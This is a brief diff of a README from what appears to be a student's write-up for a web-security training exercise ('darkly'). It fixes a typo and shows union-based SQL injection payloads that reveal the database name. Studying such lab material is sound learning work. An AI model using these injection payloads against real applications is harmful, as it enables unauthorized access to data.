OussamaElouarti/darkly_42/sql_injection_1/Ressources/README.md

 > 0 union select 1,2

-Lets deisplay the database namme to do that we can change 1 or 2 with database function
+Lets deisplay the database name to do that we can change 1 or 2 with database function

 >  0 union select 1,database()
 >